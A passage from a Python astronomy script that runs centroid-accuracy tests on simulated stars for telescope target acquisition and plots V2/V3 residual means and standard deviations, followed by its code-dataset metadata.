= results_all_tests[2][5][d][0] # Test 3\n T3meanV3 = results_all_tests[2][5][d][1] # Test 3\n labels_list = ['Avg in Pixel Space', 'Avg in Sky', 'No Avg']\n arrx = [T1meanV2, T2meanV2, T3meanV2]\n arry = [T1meanV3, T2meanV3, T3meanV3]\n print_side_values = [T1sigmaV2, T1meanV2, T2sigmaV2, T2meanV2, T3sigmaV2, T3meanV2,\n T1sigmaV3, T1meanV3, T2sigmaV3, T2meanV3, T3sigmaV3, T3meanV3]\n print_side_string = ['V2$\\mu$ [marcsec]', 'V3$\\mu$ [marcsec]']\n # determine which one is larger\n if np.abs(T1meanV2) > np.abs(T1meanV3):\n largV = np.abs(T1meanV2)+np.abs(T1meanV2)*0.5\n else:\n largV = np.abs(T1meanV3)+np.abs(T1meanV3)*0.5\n xlims, ylims = [-1*largV, largV], [-1*largV, largV]\n\n vp.make_plot(cwincase, arrx, arry, xlabel, ylabel, plot_title=plot_title,\n labels_list=labels_list, xlims=xlims, ylims=ylims,\n print_side_string=print_side_string, print_side_values=print_side_values,\n save_plot=save_plots, show_plot=show_plots, destination=destination)\n\n\n # Graphical display of the standard deviation\n plot_title = r'Graphical Display of the Standard Deviation, $\\sigma$'\n destination = os.path.join(gen_path, 'plots/V2V3_Cwin'+repr(cwin)+'.jpg')\n if len(list_test2perform) == 3:\n arrx = [results_all_tests[0][4][v], results_all_tests[1][4][v], results_all_tests[2][4][v]]\n arry = [results_all_tests[0][4][v+1], results_all_tests[1][4][v+1], results_all_tests[2][4][v+1]]\n # determine which one is larger\n maxx = max(np.abs(results_all_tests[2][4][v]))\n maxy = max(np.abs(results_all_tests[2][4][v+1]))\n new_stars_sample = [results_all_tests[0][1][s], results_all_tests[1][1][s], results_all_tests[2][1][s]]\n else:\n arrx = [results_all_tests[0][4][v]]\n arry = [results_all_tests[0][4][v+1]]\n # determine which one is larger\n maxx = max(np.abs(results_all_tests[0][4][v]))\n maxy = max(np.abs(results_all_tests[0][4][v+1]))\n new_stars_sample = [results_all_tests[0][1][s]]\n if maxx > maxy:\n largsig = maxx + maxx*0.5\n else:\n largsig = maxy + maxy*0.5\n xlims, ylims = [-1*largsig, largsig], [-1*largsig, largsig]\n vp.make_plot(cwincase, arrx, arry, xlabel, ylabel, plot_title=plot_title,\n labels_list=labels_list, xlims=xlims, ylims=ylims,\n print_side_string=print_side_string, print_side_values=print_side_values,\n save_plot=save_plots, show_plot=show_plots, destination=destination,\n star_sample=new_stars_sample)\n\n return results_all_tests\n\n\n\n#######################################################################################################################\n\n\n### CODE\n\nif __name__ == '__main__':\n\n\n # SET PRIMARY PARAMETERS\n do_plots = True # 1. 
Least squares plot in V2/V3 space showing the true position (0,0)\n # and the mean of the three calculation cases: Averaging in pixel space,\n # averaging on sky, and no averaging : True or False\n # 2. Same plot but instead of the mean show all stars in one 20star calculation\n save_plots = False # Save the plots? True or False\n show_plots = True # Show the plots? True or False\n detector = 'both' # Integer (491 or 492) OR string, 'both' to select stars from both detectors\n output_full_detector = True # Give resulting coordinates in terms of full detector: True or False\n show_onscreen_results = True # Want to show on-screen resulting V2s, V3s and statistics? True or False\n show_pixpos_and_v23_plots = False # Show the plots of x-y and v2-v3 residual positions?\n save_text_file = False # Want to save the text file of comparison? True or False\n save_centroid_disp = False # Save the display with measured and true positions?\n keep_bad_stars = False # Keep the bad stars in the sample (both positions measured wrong)? True or False\n keep_ugly_stars = True # Keep the ugly stars (one position measured wrong)? True or False\n perform_abs_threshold = False # Perform abs_threshold routine (True) or only perform least squares routine (False)\n stars_in_sample = 5 # Number of stars in sample (165 for all good and uglies)\n scene = 1 # Integer or string, scene=1 is constant Mag 23, scene=2 is stars with Mag 18-23\n background_method = 'frac' # Select either 'fractional', 'fixed', or None\n background2use = 0.3 # Background to use for analysis: None or float\n shutters = \"rapid\" # Shutter velocity, string: \"rapid\" or \"slow\"\n noise = \"real\" # Noise level, string: \"nonoise\" or \"real\"\n filter_input = \"F140X\" # Filter, string: for now only test case is \"F140X\"\n test2perform = \"all\" # Test to perform, string: \"all\", \"T1\", \"T2\", \"T3\" for test 1, 2, and 3, respectively\n Nsigma = 2.5 # N-sigma rejection of bad stars: integer or float\n abs_threshold = 0.32 # threshold to reject points after each iteration of least squares routine, default=0.32\n min_elements = 4 # minimum number of elements in the absolute threshold least squares routine, default=4\n max_iters_Nsig = 10 # Max number of iterations for N-sigma function: integer\n\n # SET SECONDARY PARAMETERS THAT CAN BE ADJUSTED\n checkbox_size = 3 # Real checkbox size\n xwidth_list = [3, 5, 7] # Number of rows of the centroid region\n ywidth_list = [3, 5, 7] # Number of columns of the centroid region\n vlim = (1, 100) # Sensitivity limits of image, i.e. (0.001, 0.1)\n threshold = 0.01 # Convergence threshold of accepted difference between checkbox centroid and coarse location\n max_iter = 10 # Maximum number of iterations for finding coarse location\n verbose = False # Show some debug messages (i.e. resulting calculations)\n debug = False # See all debug messages (i.e. values of variables and calculations)\n arcsecs = True # Final units in arcsecs? True or False (=degrees)\n determine_moments = False # Want to determine 2nd and 3rd moments?\n display_master_img = False # Want to see the combined ramped images for every star?\n show_centroids = False # Print measured centroid on screen: True or False\n show_disp = False # Show display of resulting positions? 
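The `Nsigma` and `max_iters_Nsig` parameters above drive an iterative N-sigma rejection of outlier stars. The project's own routine lives in the TAf module and is not included in this excerpt, so the following is a generic sketch of the technique, not its code:

```python
import numpy as np

def nsigma_clip(values, nsigma=2.5, max_iters=10):
    # Iteratively drop points farther than nsigma * std from the mean of the
    # surviving points, mirroring the Nsigma / max_iters_Nsig parameters.
    vals = np.asarray(values, dtype=float)
    keep = np.ones(vals.size, dtype=bool)
    for _ in range(max_iters):
        mu, sig = vals[keep].mean(), vals[keep].std()
        new_keep = keep & (np.abs(vals - mu) <= nsigma * sig)
        if new_keep.sum() == keep.sum():
            break  # converged: no further rejections
        keep = new_keep
    return vals[keep], keep

# Drops the 5.0 outlier after one pass, then converges.
clipped, mask = nsigma_clip([0.1, 0.2, 0.15, 0.12, 0.11, 0.14, 0.13, 5.0])
```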
(will show 2 figs, same but different contrast)\n Pier_corr = True # Include Pier's corrections to measured positions\n tilt = False # Tilt angle: True or False\n backgnd_subtraction_method = 1 # 1 = Do background subtraction on final image (after subtracting 3-2 and 2-1),\n # before converting negative values into zeros\n # 2 = Do background subtraction on 3-2 and 2-1 individually\n # None = Do not subtract background\n\n random_sample = False # choose a random sample of stars from either detector: True or False\n # control samples to be used when random is set to False\n #stars_sample = [1, 10, 23, 29, 33, 47, 61, 67, 95, 100, 107, 128, 133, 139, 151, 171, 190, 194, 195, 198]\n #stars_sample = [9, 20, 32, 48, 65, 69, 82, 83, 93, 98, 99, 107, 111, 126, 128, 136, 172, 176, 196, 198] #all good stars\n #stars_sample = [3, 26, 32, 38, 46, 48, 51, 65, 75, 84, 92, 96, 121, 122, 132, 133, 160, 174, 186, 194]\n #stars_sample = [3, 8, 9, 32, 38, 65, 96, 128, 132, 133, 136, 143, 145, 147, 160, 175, 178, 191, 193, 194] #all good stars\n #stars_sample = [32, 41, 49, 64, 65, 68, 84, 96, 99, 104, 131, 167, 175, 182, 192, 194, 195, 196, 197, 198]# all good\n #stars_sample = [2, 4, 5, 6, 11, 32, 38, 47, 81, 127, 129, 136, 138, 141, 160, 163, 166, 171, 174, 179] #* all good\n #stars_sample = [6, 18, 41, 49, 66, 75, 84, 93, 97, 99, 108, 110, 134, 140, 151, 160, 164, 175, 186, 200]# VERY good!\n #stars_sample = [15, 20, 43, 46, 47, 57, 62, 69, 71, 83, 86, 87, 90, 106, 121, 168, 179, 182, 185, 194]\n #stars_sample = [4, 42, 44, 69, 76, 96, 97, 99, 102, 114, 116, 128, 129, 130, 132, 142, 167, 176, 193, 194] # good to show bads\n stars_sample = [1, 128, 130, 131, 196]\n #stars_sample = [1, 35, 128, 130, 164]\n #stars_sample = [3, 4, 8, 32, 139]\n #stars_sample = [32, 33, 104, 188, 199]\n #stars_sample = [3, 32, 33, 133, 162]\n #stars_sample = [16, 22, 29, 50, 108]\n #stars_sample = [2, 5, 15, 46, 154, 156, 163]\n #stars_sample = [5, 80, 116, 130, 135]#, 17, 31, 113, 182]\n #stars_sample = [8, 11, 27, 44, 90]\n #stars_sample = [12, 21, 32, 54, 77]\n ##stars_sample = [22, 90, 108, 126, 145]\n #stars_sample = [101, 110, 121, 133, 200]\n #stars_sample = [111, 120, 142, 173, 180]\n #stars_sample = [10, 32, 33, 35, 42, 47, 52, 70, 73, 77, 100, 128, 130, 135, 136, 137, 141, 147, 179, 192] # all good stars *\n #stars_sample = [8, 33, 37, 38, 44, 50, 51, 54, 63, 98, 99, 109, 114, 127, 138, 139, 162, 163, 171, 186]\n #stars_sample = [3, 16, 35, 36, 39, 64, 65, 70, 73, 90, 111, 122, 129, 134, 136, 154, 165, 183, 194, 196]\n #stars_sample = [2, 4, 6, 11, 36, 38, 43, 98, 102, 109, 110, 141, 149, 160, 161, 163, 165, 173, 174, 177]\n #stars_sample = [5, 7, 8, 12, 33, 37, 40, 101, 108, 109, 111, 151, 159, 162, 166, 167, 169, 170, 175, 187]\n # bad samples:\n #stars_sample = [7, 24, 51, 56, 66, 68, 71, 72, 74, 91, 106, 109, 120, 125, 127, 128, 138, 154, 187, 188]\n #stars_sample = [8, 9, 20, 21, 39, 40, 46, 54, 58, 76, 78, 87, 88, 121, 134, 146, 150, 167, 179, 180]\n # OLNY detector 491\n #stars_sample = [101, 105, 108, 109, 111, 113, 114, 133, 136, 147, 150, 157, 158, 161, 181, 184, 185, 186, 194, 199]\n #stars_sample = [101, 104, 105, 112, 117, 118, 133, 135, 136, 140, 145, 151, 152, 157, 159, 161, 174, 178, 184, 200]\n #stars_sample = [109, 114, 128, 135, 136, 145, 149, 153, 160, 166, 171, 174, 176, 177, 193, 194, 195, 198, 199, 200]\n #stars_sample = [101, 102, 104, 107, 117, 128, 130, 131, 132, 135, 136, 137, 141, 154, 167, 184, 185, 186, 187, 193]#*\n # ONLY detector 492\n ##stars_sample = [8, 11, 19, 24, 30, 37, 39, 41, 
48, 51, 55, 65, 73, 85, 87, 88, 90, 91, 93, 98]\n #stars_sample = [2, 4, 8, 10, 11, 22, 25, 28, 33, 37, 54, 64, 68, 76, 80, 89, 96, 97, 99, 100]\n # all stars of one detector or both\n #stars_sample = [s+1 for s in range(200)]\n # Known bad stars in X and Y: 103, 105, 106, 112, 134, 152, 156, 170, 188\n #6, 23, 50, 55, 65, 67, 70, 71, 73, 90, 105, 108, 119, 124, 126, 127, 137, 153, 186, 187\n\n\n\n ######################################################\n\n ### CODE\n\n continue_code = True\n if not perform_abs_threshold and min_elements!=4:\n print ('***** You are running the code with min_elements =', min_elements, ' and No absolute threshold, ')\n continue_code = raw_input(' Do you wish to continue? y [n]')\n if continue_code == 'y':\n raw_input('Ok, continuing... but the output files will not have a marker to know the number of minimum '\n 'elements allowed in the absolute threshold routine. Press enter')\n else:\n exit()\n\n # start the timer to compute the whole running time\n start_time = time.time()\n\n # make sure that bad stars are gone if ugly stars are to be gone as well\n if not keep_ugly_stars:\n keep_bad_stars = False\n\n # Set variable as it appears defined in function\n if perform_abs_threshold:\n just_least_sqares = False # Only perform least squares routine = True, perform abs_threshold routine = False\n else:\n just_least_sqares = True\n\n # set paths\n gen_path = os.path.abspath('../resultsXrandomstars')\n path4results = \"../resultsXrandomstars/\"\n\n # Compact variables\n primary_params1 = [do_plots, save_plots, show_plots, detector, output_full_detector, show_onscreen_results,\n show_pixpos_and_v23_plots, save_text_file]\n primary_params2 = [save_centroid_disp, keep_bad_stars, keep_ugly_stars, just_least_sqares, stars_in_sample,\n scene, background_method, background2use]\n primary_params3 = [shutters, noise, filter_input, test2perform, Nsigma, abs_threshold, abs_threshold, min_elements,\n max_iters_Nsig]\n primary_params = [primary_params1, primary_params2, primary_params3]\n secondary_params1 = [checkbox_size, xwidth_list, ywidth_list, vlim, threshold, max_iter, verbose]\n secondary_params2 = [debug, arcsecs, determine_moments, display_master_img, show_centroids, show_disp]\n secondary_params3 = [Pier_corr, tilt, backgnd_subtraction_method, random_sample]\n secondary_params = [secondary_params1, secondary_params2, secondary_params3]\n\n\n # Run main function of script\n extra_string = None\n results_all_tests = run_testXrandom_stars(stars_sample, primary_params, secondary_params, path4results,\n gen_path, extra_string)\n\n\n\n '''\n common3files = '_results_'+case+'.txt'\n test_fileT1 = os.path.join(gen_path, 'T1'+common3files)\n test_fileT2 = os.path.join(gen_path, 'T2'+common3files)\n test_fileT3 = os.path.join(gen_path, 'T3'+common3files)\n txt_files = [test_fileT1, test_fileT2, test_fileT3]\n T1V2_3, T1V3_3, T1V2_5, T1V3_5, T1V2_7, T1V3_7, T1TrueV2, T1TrueV3 = np.loadtxt(test_fileT1, comments='#',\n usecols=(2,3,4,5,6,7,8,9), unpack=True)\n T2V2_3, T2V3_3, T2V2_5, T2V3_5, T2V2_7, T2V3_7, T2TrueV2, T2TrueV3 = np.loadtxt(test_fileT2, comments='#',\n usecols=(2,3,4,5,6,7,8,9), unpack=True)\n T3V2_3, T3V3_3, T3V2_5, T3V3_5, T3V2_7, T3V3_7, T3TrueV2, T3TrueV3 = np.loadtxt(test_fileT3, comments='#',\n usecols=(2,3,4,5,6,7,8,9), unpack=True)\n # for test3 we only compare to position 1 because this is how the cutouts were made in order to see the shift\n\n ls_dataTESTS = []\n for i, Tfile in enumerate(txt_files):\n ls_data = prs.load_rejected_stars(Tfile)\n 
ls_dataTESTS.append(ls_data)   # ls_dataTESTS = list of 3 dictionaries, one per file\n                               # (each dictionary contains 3 dictionaries, one per centroid window,\n                               # the keys per centroid window are: delta_theta, delta_x, delta_y,\n                               # elements_left, iteration, sigma_theta, sigma_x, and sigma_y. For the\n                               # dictionary of one of the text files, to access centroid 5, iterations\n                               # type: ls_data['5']['iterations']\n\n\n    # do the plots -> 2 plots per centroid window\n    for cwin in xwidth_list:\n        cwincase = case+'_CentroidWindow'+repr(cwin)\n\n        # Plot to compare the mean values for the 3 tests -- plot only has 3 points\n        plot_title = r'Residual Mean Values, $\\mu$'\n        xlabel = r'$\\Delta$V2 [marcsec]'\n        ylabel = r'$\\Delta$V3 [marcsec]'\n        destination = os.path.join(gen_path, 'plots/means_Cwin'+repr(cwin)+'.jpg')\n        T1sigmaV2 = ls_dataTESTS[0][str(cwin)]['sigma_x']   # Test 1 sigma V2 value\n        T2sigmaV2 = ls_dataTESTS[1][str(cwin)]['sigma_x']   # Test 2\n        T3sigmaV2 = ls_dataTESTS[2][str(cwin)]['sigma_x']   # Test 3\n        T1sigmaV3 = ls_dataTESTS[0][str(cwin)]['sigma_y']   # Test 1 sigma V3 value\n        T2sigmaV3 = ls_dataTESTS[1][str(cwin)]['sigma_y']   # Test 2\n        T3sigmaV3 = ls_dataTESTS[2][str(cwin)]['sigma_y']   # Test 3\n        T1meanV2 = ls_dataTESTS[0][str(cwin)]['delta_x']   # Test 1 mean V2 value\n        T2meanV2 = ls_dataTESTS[1][str(cwin)]['delta_x']   # Test 2\n        T3meanV2 = ls_dataTESTS[2][str(cwin)]['delta_x']   # Test 3\n        T1meanV3 = ls_dataTESTS[0][str(cwin)]['delta_y']   # Test 1 mean V3 value\n        T2meanV3 = ls_dataTESTS[1][str(cwin)]['delta_y']   # Test 2\n        T3meanV3 = ls_dataTESTS[2][str(cwin)]['delta_y']   # Test 3\n        arrx = [T1meanV2*1000.0, T2meanV2*1000.0, T3meanV2*1000.0]\n        arry = [T1meanV3*1000.0, T2meanV3*1000.0, T3meanV3*1000.0]\n        labels_list = ['Avg in Pixel Space', 'Avg in Sky', 'No Avg']\n        print_side_string = ['V2$\\mu$ [marcsec]', 'V3$\\mu$ [marcsec]']\n        print_side_values = [T1sigmaV2*1000.0, T1sigmaV3*1000.0,\n                             T2sigmaV2*1000.0, T2sigmaV3*1000.0,\n                             T3sigmaV2*1000.0, T3sigmaV3*1000.0,\n                             T1meanV2*1000.0, T1meanV3*1000.0,\n                             T2meanV2*1000.0, T2meanV3*1000.0,\n                             T3meanV2*1000.0, T3meanV3*1000.0]\n        xlims = [-5.0, 5.0]\n        ylims = [-5.0, 5.0]\n        vp.make_plot(cwincase, arrx, arry, xlabel, ylabel, plot_title=plot_title,\n                     labels_list=labels_list, xlims=xlims, ylims=ylims,\n                     print_side_string=print_side_string, print_side_values=print_side_values,\n                     save_plot=save_plots, show_plot=show_plots, destination=destination)\n\n        # Graphical display of the standard deviation\n        plot_title = r'Graphical Display of the Standard Deviation, $\\sigma$'\n        destination = os.path.join(gen_path, 'plots/V2V3_Cwin'+repr(cwin)+'.jpg')\n        if cwin == 3:\n            T1V2, T2V2, T3V2 = T1V2_3-T1TrueV2, T2V2_3-T2TrueV2, T3V2_3-T3TrueV2\n            T1V3, T2V3, T3V3 = T1V3_3-T1TrueV3, T2V3_3-T2TrueV3, T3V3_3-T3TrueV3\n        elif cwin == 5:\n            T1V2, T2V2, T3V2 = T1V2_5-T1TrueV2, T2V2_5-T2TrueV2, T3V2_5-T3TrueV2\n            T1V3, T2V3, T3V3 = T1V3_5-T1TrueV3, T2V3_5-T2TrueV3, T3V3_5-T3TrueV3\n        elif cwin == 7:\n            T1V2, T2V2, T3V2 = T1V2_7-T1TrueV2, T2V2_7-T2TrueV2, T3V2_7-T3TrueV2\n            T1V3, T2V3, T3V3 = T1V3_7-T1TrueV3, T2V3_7-T2TrueV3, T3V3_7-T3TrueV3\n        arrx = [T1V2, T2V2, T3V2]\n        arry = [T1V3, T2V3, T3V3]\n        xlims = [-20., 20.]\n        ylims = [-20., 20.]\n        vp.make_plot(cwincase, arrx, arry, xlabel, ylabel, plot_title=plot_title,\n                     labels_list=labels_list, xlims=xlims, ylims=ylims,\n                     print_side_string=print_side_string, print_side_values=print_side_values,\n                     save_plot=save_plots, show_plot=show_plots, destination=destination,\n                     star_sample=stars_sample)\n    '''\n\n    print (\"\\n Script 'testXrandom_stars.py' finished! 
Took %s seconds to finish. \\n\" % (time.time() - start_time))\n", "sub_path": "testXrandom_stars.py", "file_name": "testXrandom_stars.py", "file_ext": "py", "file_size_in_byte": 82025, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "random.choice", "line_number": 139, "usage_type": "call"}, {"api_name": "TA_functions.remove_bad_stars", "line_number": 145, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 147, "usage_type": "call"}, {"api_name": "TA_functions.remove_bad_stars", "line_number": 152, "usage_type": "call"}, {"api_name": "TA_functions.read_star_param_files", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 191, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 193, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 194, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 196, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 197, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 198, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 199, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 200, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 201, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 203, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 204, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 205, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 206, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 207, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 209, "usage_type": "call"}, {"api_name": "TA_functions.remove_bad_stars", "line_number": 263, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 266, "usage_type": "call"}, {"api_name": "TA_functions.remove_bad_stars", "line_number": 270, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 335, "usage_type": "call"}, {"api_name": "os.path", "line_number": 335, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 341, "usage_type": "call"}, {"api_name": "os.path", "line_number": 341, "usage_type": "attribute"}, {"api_name": "TA_functions.get_raw_star_directory", "line_number": 347, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 350, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 351, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 352, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 353, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 359, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 359, "usage_type": "call"}, {"api_name": "os.path", "line_number": 359, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 362, "usage_type": "call"}, {"api_name": "os.path", "line_number": 362, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 368, "usage_type": "call"}, {"api_name": "os.path", "line_number": 368, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 370, "usage_type": "call"}, {"api_name": "os.path", "line_number": 370, 
"usage_type": "attribute"}, {"api_name": "astropy.io.fits.getdata", "line_number": 394, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 394, "usage_type": "name"}, {"api_name": "numpy.shape", "line_number": 396, "usage_type": "call"}, {"api_name": "TA_functions.readimage", "line_number": 399, "usage_type": "call"}, {"api_name": "TA_functions.run_recursive_centroids", "line_number": 401, "usage_type": "call"}, {"api_name": "TA_functions.centroid2fulldetector", "line_number": 405, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 418, "usage_type": "call"}, {"api_name": "os.path", "line_number": 418, "usage_type": "attribute"}, {"api_name": "TA_functions.readimage", "line_number": 422, "usage_type": "call"}, {"api_name": "TA_functions.display_centroids", "line_number": 424, "usage_type": "call"}, {"api_name": "TA_functions.centroid2fulldetector", "line_number": 428, "usage_type": "call"}, {"api_name": "TA_functions.display_centroids", "line_number": 443, "usage_type": "call"}, {"api_name": "TA_functions.get_mindiff", "line_number": 446, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 456, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 457, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 458, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 459, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 460, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 461, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 463, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 464, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 465, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 466, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 467, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 468, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 479, "usage_type": "call"}, {"api_name": "os.path", "line_number": 479, "usage_type": "attribute"}, {"api_name": "TA_functions.writePixPos", "line_number": 481, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 525, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 525, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 528, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 528, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 529, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 529, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 530, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 530, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 552, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 552, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 553, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 553, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hlines", "line_number": 554, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 554, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.vlines", "line_number": 555, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 555, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 557, 
"usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 557, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 558, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 558, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 559, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 559, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 560, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 560, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 561, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 561, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 562, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 562, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.annotate", "line_number": 575, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 575, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.annotate", "line_number": 582, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 582, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 583, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 583, "usage_type": "name"}, {"api_name": "TA_functions.runTEST", "line_number": 639, "usage_type": "call"}, {"api_name": "TA_functions.get_stats", "line_number": 646, "usage_type": "call"}, {"api_name": "TA_functions.runTEST", "line_number": 657, "usage_type": "call"}, {"api_name": "TA_functions.get_stats", "line_number": 664, "usage_type": "call"}, {"api_name": "TA_functions.runTEST", "line_number": 675, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 697, "usage_type": "call"}, {"api_name": "TA_functions.combine2arrays", "line_number": 698, "usage_type": "call"}, {"api_name": "TA_functions.combine2arrays", "line_number": 699, "usage_type": "call"}, {"api_name": "TA_functions.combine2arrays", "line_number": 700, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 701, "usage_type": "call"}, {"api_name": "TA_functions.combine2arrays", "line_number": 702, "usage_type": "call"}, {"api_name": "TA_functions.combine2arrays", "line_number": 703, "usage_type": "call"}, {"api_name": "TA_functions.combine2arrays", "line_number": 704, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 705, "usage_type": "call"}, {"api_name": "TA_functions.combine2arrays", "line_number": 706, "usage_type": "call"}, {"api_name": "TA_functions.combine2arrays", "line_number": 707, "usage_type": "call"}, {"api_name": "TA_functions.combine2arrays", "line_number": 708, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 709, "usage_type": "call"}, {"api_name": "TA_functions.combine2arrays", "line_number": 710, "usage_type": "call"}, {"api_name": "TA_functions.combine2arrays", "line_number": 711, "usage_type": "call"}, {"api_name": "TA_functions.combine2arrays", "line_number": 712, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 713, "usage_type": "call"}, {"api_name": "TA_functions.combine2arrays", "line_number": 714, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 714, "usage_type": "call"}, {"api_name": "TA_functions.combine2arrays", "line_number": 715, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 715, "usage_type": "call"}, {"api_name": "TA_functions.get_stats", "line_number": 
722, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 734, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 734, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 737, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 737, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 738, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 738, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 739, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 739, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 767, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 767, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 768, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 768, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hlines", "line_number": 769, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 769, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.vlines", "line_number": 770, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 770, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 772, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 772, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 773, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 773, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 774, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 774, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 775, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 775, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 776, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 776, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 777, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 777, "usage_type": "name"}, {"api_name": 